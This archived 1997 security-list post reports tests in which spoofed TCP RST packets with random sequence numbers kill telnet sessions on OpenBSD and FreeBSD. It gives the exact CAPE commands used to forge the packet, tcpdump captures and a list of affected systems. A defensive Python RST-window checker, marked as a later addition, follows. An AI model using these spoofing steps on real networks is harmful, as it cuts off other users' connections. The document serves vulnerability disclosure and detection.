Darren Reed brought this up in June, 1997, on the NetBSD security list, after which I performed some tests. I ended up with a number of questions after doing this, but never followed up to determine what was going on. Anyways, here's my old message.

- Oliver
Network Associates, Inc.

------

Ok, here's how my tests turned out:

I have 3 systems involved:

199.185.231.20 - OpenBSD system
199.185.231.24 - FreeBSD system
199.185.231.25 - BSDI system

I'm telneted from BSDI to FreeBSD, and monitoring and spoofing from the OpenBSD system using tcpdump and CAPE.

20:25:01.261260 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: P 2752239993:2752239994(1) ack 4220895731 win 8760 <nop,nop,timestamp 750118 2277749> [tos 0x10]
20:25:01.263337 freebsd.secnet.com.telnet > bsdi.secnet.com.3349: P 1:55(54) ack 1 win 17376 <nop,nop,timestamp 2278005 750118> (DF) [tos 0x10]

So I'm logged into FreeBSD from port 3349 on the BSDI system.

On OpenBSD..

bash# ./cape -i
Welcome to CAPE. "help" for general help, "help topic" for help on topic
Active network interfaces:
- Interface: lo0 Address: 127.0.0.1
- Interface: ed2 Address: 199.185.231.20
cape> iface=ed2
cape> gateway=199.185.231.24
cape> ip
cape> ip_src=199.185.231.23
cape> ip_dst=199.185.231.24
cape> ip_proto=IPPROTO_TCP
cape> tcp
cape> tcp_sport=3349
cape> tcp_dport=23
cape> tcp_flags=RST
cape> send
Processing: Packet transmitted

Here's my spoofed packet with random seq/ack numbers:

20:28:20.885563 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: R 1649760492:1649760492(0) win 4096

As soon as I hit a key on the FreeBSD system...

[20:25:01] [freebsd] [/usr/local/scanner] % Connection closed by foreign host.

Poof, it works, repeatable every time. This works when spoofing the packet from the BSDI system TO the FreeBSD system. For some reason (which I've been unable to figure out yet), I cannot spoof packets from the FreeBSD system to the BSDI system and have this work. This works between OpenBSD and FreeBSD however (both ways).

This doesn't work against Solaris. Here's what I found with the systems here:

OpenBSD 2.1 - vulnerable
FreeBSD 2.1.x - vulnerable
BSDI - appears not vulnerable (?)
Solaris 2.5 - appears not vulnerable
IRIX 6.2 - appears not vulnerable
Linux - appears not vulnerable
Windows NT - appears not vulnerable
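A defender-side check for the behaviour the post demonstrates, added here as an example and not part of Oliver's message or of CAPE: it walks tcpdump lines, tracks each direction's next expected sequence number and the peer's advertised window, and reports whether each RST falls inside that window, which is the test RFC 793 requires before a reset is honoured (the vulnerable stacks above accepted a RST with a random seq). The input is the three tcpdump lines quoted in the post; sequence numbers are assumed absolute (as tcpdump -S prints them), which holds for the one seq the check depends on.

```python
import re

# Sample input: the three tcpdump lines quoted in the post (two telnet segments
# and the spoofed RST). Only the first line carries an absolute seq; it is the
# only seq this check relies on. The second line's relative numbers merely set
# state for the reverse direction, which the RST check does not consult.
CAPTURE = """\
20:25:01.261260 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: P 2752239993:2752239994(1) ack 4220895731 win 8760 <nop,nop,timestamp 750118 2277749> [tos 0x10]
20:25:01.263337 freebsd.secnet.com.telnet > bsdi.secnet.com.3349: P 1:55(54) ack 1 win 17376 <nop,nop,timestamp 2278005 750118> (DF) [tos 0x10]
20:28:20.885563 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: R 1649760492:1649760492(0) win 4096
"""

# Classic tcpdump TCP line: "ts src > dst: FLAGS seq:end(len) [ack N] win W ..."
TCP_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) > (?P<dst>\S+): (?P<flags>[SFRP.]+) "
    r"(?:(?P<seq>\d+):\d+\((?P<len>\d+)\) )?(?:ack (?P<ack>\d+) )?win (?P<win>\d+)"
)

def parse(line):
    m = TCP_LINE.match(line)
    if not m:
        return None
    d = m.groupdict()
    for k in ("seq", "len", "ack", "win"):
        d[k] = int(d[k]) if d[k] is not None else None
    return d

def check_rsts(lines):
    """Return one finding per RST seen on a tracked flow, with the seq the
    receiver expected, the window it advertised, and whether the RST fits."""
    rcv_nxt = {}   # (src, dst) -> next seq the dst side expects from src
    window = {}    # (src, dst) -> window src last advertised to dst
    findings = []
    for line in lines:
        p = parse(line)
        if p is None:
            continue
        flow, reverse = (p["src"], p["dst"]), (p["dst"], p["src"])
        window[flow] = p["win"]
        if "R" in p["flags"] and flow in rcv_nxt and reverse in window:
            expected, wnd = rcv_nxt[flow], window[reverse]
            # Modular distance so a 32-bit sequence wrap does not break the test.
            in_window = (p["seq"] - expected) % 2**32 < wnd
            findings.append({"ts": p["ts"], "flow": f"{p['src']} > {p['dst']}",
                             "seq": p["seq"], "expected": expected,
                             "window": wnd, "in_window": in_window})
            continue
        if p["seq"] is not None:
            rcv_nxt[flow] = (p["seq"] + p["len"]) % 2**32
    return findings

if __name__ == "__main__":
    for f in check_rsts(CAPTURE.splitlines()):
        verdict = "in window" if f["in_window"] else "OUT OF WINDOW, should be dropped"
        print(f"{f['ts']} RST on {f['flow']} seq={f['seq']} expected={f['expected']} win={f['window']}: {verdict}")
```

An out-of-window verdict on a RST that nonetheless tore the session down is the signature of the behaviour the post reports.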
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:14:31 PDT